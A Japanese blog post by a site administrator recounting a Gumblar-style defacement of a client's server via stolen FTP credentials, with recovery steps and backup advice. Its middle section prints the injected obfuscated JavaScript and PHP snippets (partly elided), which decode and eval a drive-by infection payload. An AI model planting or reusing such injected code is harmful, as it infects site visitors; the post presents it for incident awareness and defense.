WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

*

サブコンテンツ

危険な高額塾

タグ

人物 大園式転売塾 Windows followmatic 株式会社Free Agent Style KMSpico フォローマティック アンダーグラウンドメソッド タイガーウイング ネットビジネス大全集 High Concept Marketing css ヤフー Agency Business Line PPC 与沢翼×蝶乃舞 インターネットビジネススクール やしろひろたみ 自動 秀吉塾天下統一 Google Maps せどり インペリアルゴールド ネットショップ 掲示板 バイドゥー 大園転売塾 小笠原健一 アドセンス tool フレンドシップメール Firefox ざくざく君 スマホ 池田純矢 Chrome スクロール 特権ビジネス メモ ヤフーショッピング Internet Explorer MovableTYpe ビジネス 流出 ライブチャット SmoothScroll.js 石井匠 ツイッター 高速ゲーム 短縮URLツール twitter 上位表示 宮田麗花 株式会社SRシステム DTD SEO Ban Hammer MT バイマ エクスチェンジ MasterCollection 画像 ネットガレージ アレックス式ネオせどりスクール 切り抜き マイクロソフト シャンプー 株式会社WINGOOD 感染 クラック XHTML CS5 ランキング getElementByTagName ボタン postpost 既得権益 スカイプ 新井浩 マルウエア クロスアフィリエイト ping送信 Yahoo 株式会社A-ブログレス 個人情報 Wordpress Content Slide ping 加工 セキュリティ トレンドアフィリエイト getElementById テーマ やしろ塾 伊藤虎太郎 CGI レタープレス 村上省吾 DOCTYPE @PAGES WEB 立体 優先順位 無断送信 BBIZ バナー 81a338 クリックランキング LinkShaker クラウド変換 デスクトップ コピーボタン 無料 不正アクセス メルマガ配信システム RSS ムーバブルタイプ 自己アフィリエイト functions.php Adobe 詐欺 登録禁止 土屋ひろし 与沢翼 HTML4.0 CS6 カスタマイズ トレンドキーワード 加藤 秀吉 ECサイト ブラウザ 三橋美仁 短縮URL 到達率 ツール 定型文 副業術 自己アフィリ ワードプレス Extension Manager 詐欺組織 中山秀人 復元 ウイルス 滑らか PHP RMT エキスパートメール 申請金ビジネス インターネット 比較 北川 雅嗣 system 権利収入 関根義光 ぼかし BUYMA 株式会社ニュース 球体 転売大園塾 ハート トラフィック アフィリエイト ネットゲーム IP マニュアル 日本語入力変換ソフト FTP ドメイン クラウド入力機能 プラグイン 管理ツール Diamond Affiliate Masters Program Login LockDown 株式会社バンザイ 伊藤 虎太郎 プロモーション wpXサーバー 改ざん レイアウト崩れ Google Maps API 百度 レンタルサーバー 大西良幸 アクセスアップ 管理画面 ソース 固定ページ force puzzle プロファイル Newpost Catch ライオンアフィリエイト 脆弱性 YouTube Maniax 2017 伊藤 歩 IE 背景 JavaScript ネットビジネス KMS認証 関根塾 Baidu 伊藤塾 インターネットエクスプローラー アンダーグラウンドアフィリエイトクラブ SKナレッジ アレックス 不労所得の神 バックアップ テンプレート 出店料 特定のメールアドレス 個人情報流出 リンクシェイカー EC ウインドウ 自動化 タスクバー 配布 ブラシ office スムーズ html ブルートフォースアタック スタイルシート ソースコード explorer ブロック ブロックポリシー Cash on Wordpress アフィ匠 ユーチューブマニアクス2017 もざ FireWorks iphone パズル エディタ SyntaxHighlighter 不正送信 サンタ 無料オファー 情報商材 ネットビジネス最後の楽園 Windows 7 ソフト アクセス制限 表示 賢威 Tiger-Wing google レビュー wp-login.php サイト改ざん ライン ヤフオク 久積篤史 ブラクラ 放射線 .htaccess 切抜き レイアウト 株式会社SRシステム ロリポップ 高額塾 モザイク ネオヒルズアカデミー Favicon インフォトップ WP がら空きビジネス 音量アイコン 改竄 Youtube エクスプローラー アイコン 量産 大園麗花 原田真 RSS Includes Pages グラデーション document.all IBS 秒速で1億円稼ぐ男 Thunderbird wordpress 蝶乃舞 ファビコン moza 山下 android

アーカイブ

エステトラブル

このページの先頭へ